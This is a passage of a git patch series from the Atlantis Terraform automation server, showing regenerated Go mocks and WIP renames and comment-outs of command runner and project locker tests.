*MockAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace return ret0 } +func (mock *MockAtlantisWorkspaceLocker) TryLock2(repoFullName string, workspace string, pullNum int) (func(), error) { + params := []pegomock.Param{repoFullName, workspace, pullNum} + result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock2", params, []reflect.Type{reflect.TypeOf((*func())(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 func() + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(func()) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + func (mock *MockAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace string, pullNum int) { params := []pegomock.Param{repoFullName, workspace, pullNum} pegomock.GetGenericMockFrom(mock).Invoke("Unlock", params, []reflect.Type{}) @@ -87,6 +103,41 @@ func (c *AtlantisWorkspaceLocker_TryLock_OngoingVerification) GetAllCapturedArgu return } +func (verifier *VerifierAtlantisWorkspaceLocker) TryLock2(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_TryLock2_OngoingVerification { + params := []pegomock.Param{repoFullName, workspace, pullNum} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock2", params) + return &AtlantisWorkspaceLocker_TryLock2_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type AtlantisWorkspaceLocker_TryLock2_OngoingVerification struct { + mock *MockAtlantisWorkspaceLocker + methodInvocations []pegomock.MethodInvocation +} + +func (c *AtlantisWorkspaceLocker_TryLock2_OngoingVerification) GetCapturedArguments() (string, string, int) { + repoFullName, workspace, pullNum := c.GetAllCapturedArguments() + return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1] +} + +func (c *AtlantisWorkspaceLocker_TryLock2_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]string, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(string) + } + _param1 = make([]string, len(params[1])) + for u, param := range params[1] { + _param1[u] = param.(string) + } + _param2 = make([]int, len(params[2])) + for u, param := range params[2] { + _param2[u] = param.(int) + } + } + return +} + func (verifier *VerifierAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_Unlock_OngoingVerification { params := []pegomock.Param{repoFullName, workspace, pullNum} methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Unlock", params) diff --git a/server/events/mocks/mock_executor.go b/server/events/mocks/mock_executor.go deleted file mode 100644 index 208f43050e..0000000000 --- a/server/events/mocks/mock_executor.go +++ /dev/null @@ -1,76 +0,0 @@ -// Automatically generated by pegomock. DO NOT EDIT! -// Source: github.com/runatlantis/atlantis/server/events (interfaces: Executor) - -package mocks - -import ( - "reflect" - - pegomock "github.com/petergtz/pegomock" - events "github.com/runatlantis/atlantis/server/events" -) - -type MockExecutor struct { - fail func(message string, callerSkip ...int) -} - -func NewMockExecutor() *MockExecutor { - return &MockExecutor{fail: pegomock.GlobalFailHandler} -} - -func (mock *MockExecutor) Execute(ctx *events.CommandContext) events.CommandResult { - params := []pegomock.Param{ctx} - result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.CommandResult)(nil)).Elem()}) - var ret0 events.CommandResult - if len(result) != 0 { - if result[0] != nil { - ret0 = result[0].(events.CommandResult) - } - } - return ret0 -} - -func (mock *MockExecutor) VerifyWasCalledOnce() *VerifierExecutor { - return &VerifierExecutor{mock, pegomock.Times(1), nil} -} - -func (mock *MockExecutor) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierExecutor { - return &VerifierExecutor{mock, invocationCountMatcher, nil} -} - -func (mock *MockExecutor) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierExecutor { - return &VerifierExecutor{mock, invocationCountMatcher, inOrderContext} -} - -type VerifierExecutor struct { - mock *MockExecutor - invocationCountMatcher pegomock.Matcher - inOrderContext *pegomock.InOrderContext -} - -func (verifier *VerifierExecutor) Execute(ctx *events.CommandContext) *Executor_Execute_OngoingVerification { - params := []pegomock.Param{ctx} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params) - return &Executor_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} -} - -type Executor_Execute_OngoingVerification struct { - mock *MockExecutor - methodInvocations []pegomock.MethodInvocation -} - -func (c *Executor_Execute_OngoingVerification) GetCapturedArguments() *events.CommandContext { - ctx := c.GetAllCapturedArguments() - return ctx[len(ctx)-1] -} - -func (c *Executor_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { - params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) - if len(params) > 0 { - _param0 = make([]*events.CommandContext, len(params[0])) - for u, param := range params[0] { - _param0[u] = param.(*events.CommandContext) - } - } - return -} diff --git a/server/events/mocks/mock_project_lock.go b/server/events/mocks/mock_project_lock.go new file mode 100644 index 0000000000..b28b6d2206 --- /dev/null +++ b/server/events/mocks/mock_project_lock.go @@ -0,0 +1,98 @@ +// Automatically generated by pegomock. DO NOT EDIT! +// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectLocker) + +package mocks + +import ( + "reflect" + + pegomock "github.com/petergtz/pegomock" + events "github.com/runatlantis/atlantis/server/events" + models "github.com/runatlantis/atlantis/server/events/models" + logging "github.com/runatlantis/atlantis/server/logging" +) + +type MockProjectLocker struct { + fail func(message string, callerSkip ...int) +} + +func NewMockProjectLocker() *MockProjectLocker { + return &MockProjectLocker{fail: pegomock.GlobalFailHandler} +} + +func (mock *MockProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*events.TryLockResponse, error) { + params := []pegomock.Param{log, pull, user, workspace, project} + result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock", params, []reflect.Type{reflect.TypeOf((**events.TryLockResponse)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 *events.TryLockResponse + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(*events.TryLockResponse) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + +func (mock *MockProjectLocker) VerifyWasCalledOnce() *VerifierProjectLocker { + return &VerifierProjectLocker{mock, pegomock.Times(1), nil} +} + +func (mock *MockProjectLocker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectLocker { + return &VerifierProjectLocker{mock, invocationCountMatcher, nil} +} + +func (mock *MockProjectLocker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectLocker { + return &VerifierProjectLocker{mock, invocationCountMatcher, inOrderContext} +} + +type VerifierProjectLocker struct { + mock *MockProjectLocker + invocationCountMatcher pegomock.Matcher + inOrderContext *pegomock.InOrderContext +} + +func (verifier *VerifierProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) *ProjectLocker_TryLock_OngoingVerification { + params := []pegomock.Param{log, pull, user, workspace, project} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock", params) + return &ProjectLocker_TryLock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type ProjectLocker_TryLock_OngoingVerification struct { + mock *MockProjectLocker + methodInvocations []pegomock.MethodInvocation +} + +func (c *ProjectLocker_TryLock_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, models.PullRequest, models.User, string, models.Project) { + log, pull, user, workspace, project := c.GetAllCapturedArguments() + return log[len(log)-1], pull[len(pull)-1], user[len(user)-1], workspace[len(workspace)-1], project[len(project)-1] +} + +func (c *ProjectLocker_TryLock_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []models.PullRequest, _param2 []models.User, _param3 []string, _param4 []models.Project) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*logging.SimpleLogger, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*logging.SimpleLogger) + } + _param1 = make([]models.PullRequest, len(params[1])) + for u, param := range params[1] { + _param1[u] = param.(models.PullRequest) + } + _param2 = make([]models.User, len(params[2])) + for u, param := range params[2] { + _param2[u] = param.(models.User) + } + _param3 = make([]string, len(params[3])) + for u, param := range params[3] { + _param3[u] = param.(string) + } + _param4 = make([]models.Project, len(params[4])) + for u, param := range params[4] { + _param4[u] = param.(models.Project) + } + } + return +} diff --git a/server/events/vcs/mocks/mock_client.go b/server/events/vcs/mocks/mock_client.go index 56aa654b35..025488befd 100644 --- a/server/events/vcs/mocks/mock_client.go +++ b/server/events/vcs/mocks/mock_client.go @@ -35,8 +35,8 @@ func (mock *MockClient) GetModifiedFiles(repo models.Repo, pull models.PullReque return ret0, ret1 } -func (mock *MockClient) CreateComment(repo models.Repo, pull models.PullRequest, comment string) error { - params := []pegomock.Param{repo, pull, comment} +func (mock *MockClient) CreateComment(repo models.Repo, pullNum int, comment string) error { + params := []pegomock.Param{repo, pullNum, comment} result := pegomock.GetGenericMockFrom(mock).Invoke("CreateComment", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()}) var ret0 error if len(result) != 0 { @@ -124,8 +124,8 @@ func (c *Client_GetModifiedFiles_OngoingVerification) GetAllCapturedArguments() return } -func (verifier *VerifierClient) CreateComment(repo models.Repo, pull models.PullRequest, comment string) *Client_CreateComment_OngoingVerification { - params := []pegomock.Param{repo, pull, comment} +func (verifier *VerifierClient) CreateComment(repo models.Repo, pullNum int, comment string) *Client_CreateComment_OngoingVerification { + params := []pegomock.Param{repo, pullNum, comment} methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "CreateComment", params) return &Client_CreateComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} } @@ -135,21 +135,21 @@ type Client_CreateComment_OngoingVerification struct { methodInvocations []pegomock.MethodInvocation } -func (c *Client_CreateComment_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) { - repo, pull, comment := c.GetAllCapturedArguments() - return repo[len(repo)-1], pull[len(pull)-1], comment[len(comment)-1] +func (c *Client_CreateComment_OngoingVerification) GetCapturedArguments() (models.Repo, int, string) { + repo, pullNum, comment := c.GetAllCapturedArguments() + return repo[len(repo)-1], pullNum[len(pullNum)-1], comment[len(comment)-1] } -func (c *Client_CreateComment_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) { +func (c *Client_CreateComment_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []int, _param2 []string) { params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) if len(params) > 0 { _param0 = make([]models.Repo, len(params[0])) for u, param := range params[0] { _param0[u] = param.(models.Repo) } - _param1 = make([]models.PullRequest, len(params[1])) + _param1 = make([]int, len(params[1])) for u, param := range params[1] { - _param1[u] = param.(models.PullRequest) + _param1[u] = param.(int) } _param2 = make([]string, len(params[2])) for u, param := range params[2] { diff --git a/server/logging/simple_logger.go b/server/logging/simple_logger.go index ddb56ebcd4..eca5778e4f 100644 --- a/server/logging/simple_logger.go +++ b/server/logging/simple_logger.go @@ -23,6 +23,8 @@ import ( "unicode" ) +//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_simple_logging.go SimpleLogging + // SimpleLogging is the interface that our SimpleLogger implements. // It's really only used for mocking when we need to test what's being logged. type SimpleLogging interface { From 9e1d92b5d83d03924a8fbbd037b1de501efd5b4d Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 21 Jun 2018 19:07:42 +0100 Subject: [PATCH 43/69] WIP --- server/events/command_runner_test.go | 46 ++++++---------------------- 1 file changed, 10 insertions(+), 36 deletions(-) diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go index 456ce6d293..dcb2c77fde 100644 --- a/server/events/command_runner_test.go +++ b/server/events/command_runner_test.go @@ -69,7 +69,7 @@ func setup(t *testing.T) { } } -func TestExecuteCommand_LogPanics(t *testing.T) { +func TestRunCommentCommand_LogPanics(t *testing.T) { t.Log("if there is a panic it is commented back on the pull request") setup(t) ch.AllowForkPRs = true // Lets us get to the panic code. @@ -80,7 +80,7 @@ func TestExecuteCommand_LogPanics(t *testing.T) { Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic") } -func TestExecuteCommand_NoGithubPullGetter(t *testing.T) { +func TestRunCommentCommand_NoGithubPullGetter(t *testing.T) { t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged") setup(t) ch.GithubPullGetter = nil @@ -88,7 +88,7 @@ func TestExecuteCommand_NoGithubPullGetter(t *testing.T) { Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String()) } -func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) { +func TestRunCommentCommand_NoGitlabMergeGetter(t *testing.T) { t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged") setup(t) ch.GitlabMergeRequestGetter = nil @@ -96,7 +96,7 @@ func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) { Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String()) } -func TestExecuteCommand_GithubPullErr(t *testing.T) { +func TestRunCommentCommand_GithubPullErr(t *testing.T) { t.Log("if getting the github pull request fails an error should be logged") setup(t) When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) @@ -104,7 +104,7 @@ func TestExecuteCommand_GithubPullErr(t *testing.T) { Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String()) } -func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) { +func TestRunCommentCommand_GitlabMergeRequestErr(t *testing.T) { t.Log("if getting the gitlab merge request fails an error should be logged") setup(t) When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) @@ -112,7 +112,7 @@ func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) { Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String()) } -func TestExecuteCommand_GithubPullParseErr(t *testing.T) { +func TestRunCommentCommand_GithubPullParseErr(t *testing.T) { t.Log("if parsing the returned github pull request fails an error should be logged") setup(t) var pull github.PullRequest @@ -123,7 +123,7 @@ func TestExecuteCommand_GithubPullParseErr(t *testing.T) { Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String()) } -func TestExecuteCommand_ForkPRDisabled(t *testing.T) { +func TestRunCommentCommand_ForkPRDisabled(t *testing.T) { t.Log("if a command is run on a forked pull request and this is disabled atlantis should" + " comment saying that this is not allowed") setup(t) @@ -141,7 +141,7 @@ func TestExecuteCommand_ForkPRDisabled(t *testing.T) { vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag) } -func TestExecuteCommand_ClosedPull(t *testing.T) { +func TestRunCommentCommand_ClosedPull(t *testing.T) { t.Log("if a command is run on a closed pull request atlantis should" + " comment saying that this is not allowed") setup(t) @@ -156,33 +156,7 @@ func TestExecuteCommand_ClosedPull(t *testing.T) { vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests") } -func TestExecuteCommand_WorkspaceLocked(t *testing.T) { - t.Log("if the workspace is locked, should comment back on the pull") - setup(t) - pull := &github.PullRequest{ - State: github.String("closed"), - } - cmd := events.CommentCommand{ - Name: events.Plan, - Workspace: "workspace", - } - - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) - When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) - When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false) - ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) - - msg := "The workspace workspace is currently locked by another" + - " command that is running for this pull request." + - " Wait until the previous command is complete and try again." - ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, cmd.CommandName()) - _, _, result := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments() - Equals(t, msg, result.Failure) - vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num, - "**Plan Failed**: "+msg+"\n\n") -} - -func TestExecuteCommand_FullRun(t *testing.T) { +func TestRunCommentCommand_FullRun(t *testing.T) { t.Log("when running a plan, apply should comment") pull := &github.PullRequest{ State: github.String("closed"), @@ -214,7 +188,7 @@ func TestExecuteCommand_FullRun(t *testing.T) { } } -func TestExecuteCommand_ForkPREnabled(t *testing.T) { +func TestRunCommentCommand_ForkPREnabled(t *testing.T) { t.Log("when running a plan on a fork PR, it should succeed") setup(t) From cf3e654733adee986686dfff276ad3e0f05a8829 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 21 Jun 2018 22:59:02 +0100 Subject: [PATCH 44/69] Start on tests --- server/events/command_runner_test.go | 130 +++---- server/events/project_command_builder_test.go | 28 ++ server/events/project_command_runner.go | 2 +- server/events/project_locker_test.go | 366 ++++++------------ .../events/yaml/mocks/matchers/valid_spec.go | 20 + .../yaml/mocks/mock_parser_validator.go | 80 ++++ server/events/yaml/raw/step.go | 2 + server/server.go | 9 +- 8 files changed, 314 insertions(+), 323 deletions(-) create mode 100644 server/events/yaml/mocks/matchers/valid_spec.go create mode 100644 server/events/yaml/mocks/mock_parser_validator.go diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go index dcb2c77fde..ff60cf2752 100644 --- a/server/events/command_runner_test.go +++ b/server/events/command_runner_test.go @@ -117,7 +117,7 @@ func TestRunCommentCommand_GithubPullParseErr(t *testing.T) { setup(t) var pull github.PullRequest When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) - When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err")) + When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, fixtures.GitlabRepo, errors.New("err")) ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String()) @@ -135,7 +135,7 @@ func TestRunCommentCommand_ForkPRDisabled(t *testing.T) { headRepo := fixtures.GithubRepo headRepo.FullName = "forkrepo/atlantis" headRepo.Owner = "forkrepo" - When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil) + When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, modelPull.BaseRepo, headRepo, nil) ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil) vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag) @@ -150,71 +150,71 @@ func TestRunCommentCommand_ClosedPull(t *testing.T) { } modelPull := models.PullRequest{State: models.Closed} When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) - When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil) + When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, modelPull.BaseRepo, fixtures.GithubRepo, nil) ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests") } -func TestRunCommentCommand_FullRun(t *testing.T) { - t.Log("when running a plan, apply should comment") - pull := &github.PullRequest{ - State: github.String("closed"), - } - cmdResult := events.CommandResult{} - for _, c := range []events.CommandName{events.Plan, events.Apply} { - setup(t) - cmd := events.CommentCommand{ - Name: c, - Workspace: "workspace", - } - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) - When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) - When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) - switch c { - case events.Plan: - When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) - case events.Apply: - When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) - } - - ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) - - ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) - _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() - Equals(t, cmdResult, response) - vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) - workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) - } -} - -func TestRunCommentCommand_ForkPREnabled(t *testing.T) { - t.Log("when running a plan on a fork PR, it should succeed") - setup(t) - - // Enable forked PRs. - ch.AllowForkPRs = true - defer func() { ch.AllowForkPRs = false }() // Reset after test. - - var pull github.PullRequest - cmdResponse := events.CommandResult{} - cmd := events.CommentCommand{ - Name: events.Plan, - Workspace: "workspace", - } - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) - headRepo := fixtures.GithubRepo - headRepo.FullName = "forkrepo/atlantis" - headRepo.Owner = "forkrepo" - When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) - When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) - When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) - - ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) - - ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) - _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() - Equals(t, cmdResponse, response) - vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) - workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) -} +//func TestRunCommentCommand_FullRun(t *testing.T) { +// t.Log("when running a plan, apply should comment") +// pull := &github.PullRequest{ +// State: github.String("closed"), +// } +// cmdResult := events.CommandResult{} +// for _, c := range []events.CommandName{events.Plan, events.Apply} { +// setup(t) +// cmd := events.CommentCommand{ +// Name: c, +// Workspace: "workspace", +// } +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) +// When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) +// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) +// switch c { +// case events.Plan: +// When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) +// case events.Apply: +// When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) +// } +// +// ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) +// +// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) +// _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() +// Equals(t, cmdResult, response) +// vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) +// workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) +// } +//} + +//func TestRunCommentCommand_ForkPREnabled(t *testing.T) { +// t.Log("when running a plan on a fork PR, it should succeed") +// setup(t) +// +// // Enable forked PRs. +// ch.AllowForkPRs = true +// defer func() { ch.AllowForkPRs = false }() // Reset after test. +// +// var pull github.PullRequest +// cmdResponse := events.CommandResult{} +// cmd := events.CommentCommand{ +// Name: events.Plan, +// Workspace: "workspace", +// } +// When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) +// headRepo := fixtures.GithubRepo +// headRepo.FullName = "forkrepo/atlantis" +// headRepo.Owner = "forkrepo" +// When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) +// When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) +// When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) +// +// ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) +// +// ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) +// _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() +// Equals(t, cmdResponse, response) +// vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) +// workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) +//} diff --git a/server/events/project_command_builder_test.go b/server/events/project_command_builder_test.go index 79457f0dd2..b8fb20c1ca 100644 --- a/server/events/project_command_builder_test.go +++ b/server/events/project_command_builder_test.go @@ -1 +1,29 @@ package events_test + +//. "github.com/runatlantis/atlantis/testing" + +//func TestBuildAutoplanCommands(t *testing.T) { +// tmpDir, cleanup := TempDir(t) +// defer cleanup() +// +// workspace := mocks.NewMockAtlantisWorkspace() +// vcsClient := vcsmocks.NewMockClientProxy() +// +// builder := &events.DefaultProjectCommandBuilder{ +// AtlantisWorkspaceLocker: events.NewDefaultAtlantisWorkspaceLocker(), +// Workspace: workspace, +// ParserValidator: &yaml.ParserValidator{}, +// VCSClient: vcsClient, +// ProjectFinder: &events.DefaultProjectFinder{}, +// } +// +// // If autoplan is false, should return empty steps. +// ctxs, err := builder.BuildAutoplanCommands(&events.CommandContext{ +// BaseRepo: models.Repo{}, +// HeadRepo: models.Repo{}, +// Pull: models.PullRequest{}, +// User: models.User{}, +// Log: nil, +// }) +// Ok(t, err) +//} diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go index 45117c3a06..513a32fc1c 100644 --- a/server/events/project_command_runner.go +++ b/server/events/project_command_runner.go @@ -153,7 +153,7 @@ func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCo for _, req := range ctx.ProjectConfig.ApplyRequirements { switch req { case "approved": - approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull) + approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull) // nolint: vetshadow if err != nil { return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")} } diff --git a/server/events/project_locker_test.go b/server/events/project_locker_test.go index cd6c80d91a..232e144f50 100644 --- a/server/events/project_locker_test.go +++ b/server/events/project_locker_test.go @@ -13,257 +13,117 @@ // package events_test -//import ( -// . "github.com/petergtz/pegomock" -// . "github.com/runatlantis/atlantis/testing" -//) +import ( + "testing" -//var ctx = events.CommandContext{ -// Command: &events.Command{ -// Name: events.Plan, -// }, -// Log: logging.NewNoopLogger(), -//} -//var project = models.Project{} -// -//func TestExecute_LockErr(t *testing.T) { -// t.Log("when there is an error returned from TryLock we return it") -// p, l, _, _ := setupPreExecuteTest(t) -// When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{}, errors.New("err")) -// -// res := p.Execute(&ctx, "", project) -// 